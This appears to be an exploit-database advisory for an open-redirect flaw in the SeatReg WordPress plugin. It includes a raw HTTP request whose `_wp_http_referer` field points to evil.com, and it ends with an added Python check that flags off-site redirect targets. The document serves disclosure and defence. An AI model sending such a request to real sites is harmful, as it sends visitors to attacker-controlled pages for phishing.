## https://sploitus.com/exploit?id=PACKETSTORM:167888
# Exploit Title: WordPress Plugin ‘SeatReg’ - Unauthenticated Open Redirect  
# Date: 01-08-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/seatreg/  
# Version: 1.23.0  
# Tested on: Firefox  
# Contact me: mariamtariq404@gmail.com  
  
*#Description:*  
  
An open redirect is a vulnerability in which a web application or server  
uses an unvalidated, user-submitted link to redirect the user to a given  
website or page.  
  
*#Example of Burp Request:*  
```
POST /wp-admin/admin-post.php HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Origin: https://website.com
Connection: close
Cookie: {cookies_here}
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: Navigate
Sec-Fetch-Site: same-origin

new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&_wp_http_referer=https://evil.com&submit=Create+new+registration
```
*#PoC Image:*  
  
https://ibb.co/tCZWH0H  
https://ibb.co/5kh299z
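
*#Added example: validating the redirect target*

The check below is an added example, not part of the original advisory and not the SeatReg plugin's code. It parses a form POST like the request shown above and flags a `_wp_http_referer` value that would send the browser off the site named in the `Host` header. The function names, the same-host policy and the sample request (trimmed headers, placeholder nonce) are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Form fields treated as redirect targets (the one used in the request above).
REDIRECT_PARAMS = ("_wp_http_referer",)

# Constructed sample modelled on the request above; headers trimmed, nonce is a placeholder.
SAMPLE = (
    "POST /wp-admin/admin-post.php HTTP/1.1\n"
    "Host: website.com\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "new-registration-name=dedeed&action=seatreg_create_submit"
    "&seatreg-admin-nonce=NONCE&_wp_http_referer=https://evil.com"
    "&submit=Create+new+registration"
)

def is_same_site(target, site_host):
    """True only for a local absolute path or an http(s) URL whose host is site_host."""
    target = target.strip()
    # Browsers treat "\" like "/" and drop control characters, so reject both outright.
    if not target or "\\" in target or any(ord(c) < 0x20 for c in target):
        return False
    try:
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()  # hostname excludes userinfo and port
    except ValueError:  # malformed authority, e.g. a broken IPv6 literal
        return False
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept "/path" but not "//host" or "///host".
        return target.startswith("/") and not target.startswith("//")
    # Absolute or protocol-relative URL: scheme and host must both match.
    return parts.scheme in ("http", "https") and bool(host) and host == site_host.lower()

def off_site_redirects(raw_request):
    """Return (param, value) pairs whose redirect target leaves the request's Host."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    headers = {}
    for line in head.split("\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    site_host = headers.get("host", "").split(":")[0]
    fields = parse_qs(body.strip(), keep_blank_values=True)
    return [(p, v) for p in REDIRECT_PARAMS for v in fields.get(p, [])
            if not is_same_site(v, site_host)]
```

The same comparison belongs server-side before the redirect is issued; in WordPress code, `wp_safe_redirect()` and `wp_validate_redirect()` restrict redirects to allowed hosts.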